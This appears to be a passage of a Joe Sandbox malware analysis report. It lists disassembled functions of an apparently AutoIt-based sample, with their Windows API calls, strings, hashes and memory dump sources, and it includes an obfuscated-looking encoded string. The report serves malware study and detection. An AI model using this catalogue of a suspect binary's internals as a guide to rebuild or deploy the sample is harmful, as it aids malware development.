                                                                                  • Instruction ID: 58704045c1241e1d5f799dd2aa2a59f5c9dd4a9a69eaa678649edc2a8f5dbdf8
                                                                                  • Opcode Fuzzy Hash: 2af3a4f348d555559edcc5cf54ac6dfaaaff4bf1ca3c9f2e8cb7467667d9469f
                                                                                  • Instruction Fuzzy Hash: 2F514072900208BFDF109FA4EC48EAE7B79FF58321F104515F919AB2A1D7759A44EF60
                                                                                  Function 0055B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0055B7B0
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0055B7C1
                                                                                  • CharNextW.USER32(0000014E), ref: 0055B7F0
                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0055B831
                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0055B847
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0055B858
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0055B875
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 0055B8C7
                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0055B8DD
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 0055B90E
                                                                                  • _memset.LIBCMT ref: 0055B933
                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0055B97C
                                                                                  • _memset.LIBCMT ref: 0055B9DB
                                                                                  • SendMessageW.USER32 ref: 0055BA05
                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0055BA5D
                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 0055BB0A
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0055BB2C
                                                                                  • GetMenuItemInfoW.USER32(?), ref: 0055BB76
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0055BBA3
                                                                                  • DrawMenuBar.USER32(?), ref: 0055BBB2
                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 0055BBDA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                  • String ID: 0
                                                                                  • API String ID: 1073566785-4108050209
                                                                                  • Opcode ID: b8e67ef56796a28f219f49bbc07770d49f006f9224a0b0dc509398444f9f4db0
                                                                                  • Instruction ID: a3dc3090bd968c89a0c6482a8b01472cef64b6b2280bf69d95e29bd9d06ce266
                                                                                  • Opcode Fuzzy Hash: b8e67ef56796a28f219f49bbc07770d49f006f9224a0b0dc509398444f9f4db0
                                                                                  • Instruction Fuzzy Hash: 60E19C71900209AFEB209F61CC98EEE7F78FF44721F108156FD19AA290D7709A89DF60
                                                                                  Function 004F2EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Foreground
                                                                                  • String ID: ACTIVE$ALL$CLASS$H+Z$HANDLE$INSTANCE$L+Z$LAST$P+Z$REGEXPCLASS$REGEXPTITLE$T+Z$TITLE
                                                                                  • API String ID: 62970417-2349218558
                                                                                  • Opcode ID: a7c9a4866b096ced62e4f3d7f88f1d14b81d8a0b510a19ede34fd2ee5f0e0087
                                                                                  • Instruction ID: 96a42c012777f3b6fb1042e47d530d329a97708f1e6a382df80a4de1ca480c6e
                                                                                  • Opcode Fuzzy Hash: a7c9a4866b096ced62e4f3d7f88f1d14b81d8a0b510a19ede34fd2ee5f0e0087
                                                                                  • Instruction Fuzzy Hash: 02D1E630208A47ABCB04EF10C8919AEBFB0BF55344F104E1DF556575A1DB34ED9ADBA2
                                                                                  Function 0055764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(?), ref: 0055778A
                                                                                  • GetDesktopWindow.USER32 ref: 0055779F
                                                                                  • GetWindowRect.USER32(00000000), ref: 005577A6
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00557808
                                                                                  • DestroyWindow.USER32(?), ref: 00557834
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0055785D
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0055787B
                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 005578A1
                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 005578B6
                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 005578C9
                                                                                  • IsWindowVisible.USER32(?), ref: 005578E9
                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00557904
                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00557918
                                                                                  • GetWindowRect.USER32(?,?), ref: 00557930
                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00557956
                                                                                  • GetMonitorInfoW.USER32 ref: 00557970
                                                                                  • CopyRect.USER32(?,?), ref: 00557987
                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 005579F2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                  • String ID: ($0$tooltips_class32
                                                                                  • API String ID: 698492251-4156429822
                                                                                  • Opcode ID: 0c8b66bccd4ca4876035757dffc07c73843f2c6c78c0bf9b852853241a1b49eb
                                                                                  • Instruction ID: dcf1a8e31cf7e8a24ec05fac0267e404e6d163633b402793f82c4ebfc03e42c0
                                                                                  • Opcode Fuzzy Hash: 0c8b66bccd4ca4876035757dffc07c73843f2c6c78c0bf9b852853241a1b49eb
                                                                                  • Instruction Fuzzy Hash: 29B1C071608305AFDB00DF64D858B6ABBF5FF88311F00891EF9999B291D770E808CBA5
                                                                                  Function 00536CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00536CFB
                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00536D21
                                                                                  • _wcscpy.LIBCMT ref: 00536D4F
                                                                                  • _wcscmp.LIBCMT ref: 00536D5A
                                                                                  • _wcscat.LIBCMT ref: 00536D70
                                                                                  • _wcsstr.LIBCMT ref: 00536D7B
                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00536D97
                                                                                  • _wcscat.LIBCMT ref: 00536DE0
                                                                                  • _wcscat.LIBCMT ref: 00536DE7
                                                                                  • _wcsncpy.LIBCMT ref: 00536E12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                  • API String ID: 699586101-1459072770
                                                                                  • Opcode ID: 242bb05a477f0fe6ab0cf501528985995a75111755e97a15e74914c9601d6ef2
                                                                                  • Instruction ID: c6e5030e020c0bebbdc9ad9d9ad091039841f68226220d1d04356a294839b952
                                                                                  • Opcode Fuzzy Hash: 242bb05a477f0fe6ab0cf501528985995a75111755e97a15e74914c9601d6ef2
                                                                                  • Instruction Fuzzy Hash: B141F471600206BBEB10BB64CC4BEBF7FBCFF81714F004469F901A61C2EAB49A4597A5
                                                                                  Function 0050A856 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0050A939
                                                                                  • GetSystemMetrics.USER32(00000007), ref: 0050A941
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0050A96C
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 0050A974
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0050A999
                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0050A9B6
                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0050A9C6
                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0050A9F9
                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0050AA0D
                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 0050AA2B
                                                                                  • GetStockObject.GDI32(00000011), ref: 0050AA47
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0050AA52
                                                                                    • Part of subcall function 0050B63C: GetCursorPos.USER32(000000FF), ref: 0050B64F
                                                                                    • Part of subcall function 0050B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0050B66C
                                                                                    • Part of subcall function 0050B63C: GetAsyncKeyState.USER32(00000001), ref: 0050B691
                                                                                    • Part of subcall function 0050B63C: GetAsyncKeyState.USER32(00000002), ref: 0050B69F
                                                                                  • SetTimer.USER32(00000000,00000000,00000028,0050AB87), ref: 0050AA79
                                                                                  Strings
                                                                                  • vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv, xrefs: 0050A8CC
                                                                                  • AutoIt v3 GUI, xrefs: 0050A9F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                  • String ID: AutoIt v3 GUI$vv9aqg50vv9aqg50vv9aqg50vv9aqg50vv9aqg56vv9aqg56vv9aqg58vv9aqg59vv9aqg54vv9aqg55vv9aqg5evv9aqg50vv9aqg5bvv9aqg59vv9aqg56vv9aqg55vv
                                                                                  • API String ID: 1458621304-1895366553
                                                                                  • Opcode ID: 5181b77ac92258d43bf14f1abaa8162bf4f2123179847216b9cadfebdcdbf55e
                                                                                  • Instruction ID: ca402e203dc32fac1ec2eea08e537e343a84a3ba163be83a58866b6f8a7b3be0
                                                                                  • Opcode Fuzzy Hash: 5181b77ac92258d43bf14f1abaa8162bf4f2123179847216b9cadfebdcdbf55e
                                                                                  • Instruction Fuzzy Hash: C7B17871A0020AAFDB14DFA8DC49BAE7BB4FF58314F114229FA15A72D0DB34A840DB65
                                                                                  Function 00553639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00553735
                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0058DC00,00000000,?,00000000,?,?), ref: 005537A3
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 005537EB
                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00553874
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00553B94
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00553BA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                  • API String ID: 536824911-966354055
                                                                                  • Opcode ID: 5672ea0b2d145af01a449ea92210559b94d55159b2967e16d435c72a656da581
                                                                                  • Instruction ID: 654956f2d6e00bde08ea06e030065ee34253a2a163e99edaa9d6b651f0f47820
                                                                                  • Opcode Fuzzy Hash: 5672ea0b2d145af01a449ea92210559b94d55159b2967e16d435c72a656da581
                                                                                  • Instruction Fuzzy Hash: 750269752006019FCB14EF15C855E2EBBE5FF88724F04885EF98A9B2A1CB34ED45CB85
                                                                                  Function 00556BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00556C56
                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00556D16
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                  • API String ID: 3974292440-719923060
                                                                                  • Opcode ID: e8ab152b855874d2256c4aa056cd4b8b5591633037b6ad7fec58da32d73dbb58
                                                                                  • Instruction ID: fd531b0430de0b04d129f62950be3f0fef7572d0b16731cc6927ade3ca3c39b7
                                                                                  • Opcode Fuzzy Hash: e8ab152b855874d2256c4aa056cd4b8b5591633037b6ad7fec58da32d73dbb58
                                                                                  • Instruction Fuzzy Hash: 89A16D302042869FDB14EF10C866A7EBBA6BF85315F504D6EBD565B2D2DB31EC09CB81
                                                                                  Function 0052CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0052CF91
                                                                                  • __swprintf.LIBCMT ref: 0052D032
                                                                                  • _wcscmp.LIBCMT ref: 0052D045
                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0052D09A
                                                                                  • _wcscmp.LIBCMT ref: 0052D0D6
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0052D10D
                                                                                  • GetDlgCtrlID.USER32(?), ref: 0052D15F
                                                                                  • GetWindowRect.USER32(?,?), ref: 0052D195
                                                                                  • GetParent.USER32(?), ref: 0052D1B3
                                                                                  • ScreenToClient.USER32(00000000), ref: 0052D1BA
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0052D234
                                                                                  • _wcscmp.LIBCMT ref: 0052D248
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0052D26E
                                                                                  • _wcscmp.LIBCMT ref: 0052D282
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                  • String ID: %s%u
                                                                                  • API String ID: 3119225716-679674701
                                                                                  • Opcode ID: 754f3122ada78f340d9fd235eb3bd6f0cd1a975083d8e33cca64cf925458c6d4
                                                                                  • Instruction ID: 6a5ed2fba01cddc582c7a402eb3f310d3a1b81ee75769eb7e4b5179f247b7355
                                                                                  • Opcode Fuzzy Hash: 754f3122ada78f340d9fd235eb3bd6f0cd1a975083d8e33cca64cf925458c6d4
                                                                                  • Instruction Fuzzy Hash: C7A1E032204716EFD714DF64E884BAABBB8FF45354F008519FA99D21D0DB30EA55CBA1
                                                                                  Function 0052D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0052D8EB
                                                                                  • _wcscmp.LIBCMT ref: 0052D8FC
                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0052D924
                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0052D941
                                                                                  • _wcscmp.LIBCMT ref: 0052D95F
                                                                                  • _wcsstr.LIBCMT ref: 0052D970
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0052D9A8
                                                                                  • _wcscmp.LIBCMT ref: 0052D9B8
                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0052D9DF
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0052DA28
                                                                                  • _wcscmp.LIBCMT ref: 0052DA38
                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0052DA60
                                                                                  • GetWindowRect.USER32(00000004,?), ref: 0052DAC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                  • String ID: @$ThumbnailClass
                                                                                  • API String ID: 1788623398-1539354611
                                                                                  • Opcode ID: dd1e4da48936d4e715dce0ee69bc49eaef62e1e1928a9609fc1cc31df3b70ad0
                                                                                  • Instruction ID: 9ed1e89f7e651ace867d3b32f13c0d0b786b98e050c44ca5ee36b53ad7630ac6
                                                                                  • Opcode Fuzzy Hash: dd1e4da48936d4e715dce0ee69bc49eaef62e1e1928a9609fc1cc31df3b70ad0
                                                                                  • Instruction Fuzzy Hash: 96819D310082199BDB01DF14E985FAA7FB8FF86314F04846AFD899A096DB30DD85CBB1
                                                                                  Function 0052D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                  • API String ID: 1038674560-1810252412
                                                                                  • Opcode ID: d7b51bea3cddb7061cff4a9653ee49d181a55b38b8778ce8dd9b6721b4ae9fb4
                                                                                  • Instruction ID: 0270473c697e8d5ee7e1986adc48fc6ea5a2a1c8aca26ef592d5bd8ce6581f14
                                                                                  • Opcode Fuzzy Hash: d7b51bea3cddb7061cff4a9653ee49d181a55b38b8778ce8dd9b6721b4ae9fb4
                                                                                  • Instruction Fuzzy Hash: 3E31DE31A4421DAADB14FA55EE53FFDBBB4BF22314F20012AF601B10D1EB65AE44C679
                                                                                  Function 0052EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000063), ref: 0052EAB0
                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0052EAC2
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0052EAD9
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0052EAEE
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0052EAF4
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0052EB04
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0052EB0A
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0052EB2B
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0052EB45
                                                                                  • GetWindowRect.USER32(?,?), ref: 0052EB4E
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0052EBB9
                                                                                  • GetDesktopWindow.USER32 ref: 0052EBBF
                                                                                  • GetWindowRect.USER32(00000000), ref: 0052EBC6
                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0052EC12
                                                                                  • GetClientRect.USER32(?,?), ref: 0052EC1F
                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0052EC44
                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0052EC6F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                  • String ID:
                                                                                  • API String ID: 3869813825-0
                                                                                  • Opcode ID: 53b7ddd9a7e69179a915cc565fbb073dbd8319ee69067e2a946b659838eb6532
                                                                                  • Instruction ID: 19f6df79ef8c9eb0e40fb59eb2a198fd1a692ba959bdb3df68780e9718fdcec9
                                                                                  • Opcode Fuzzy Hash: 53b7ddd9a7e69179a915cc565fbb073dbd8319ee69067e2a946b659838eb6532
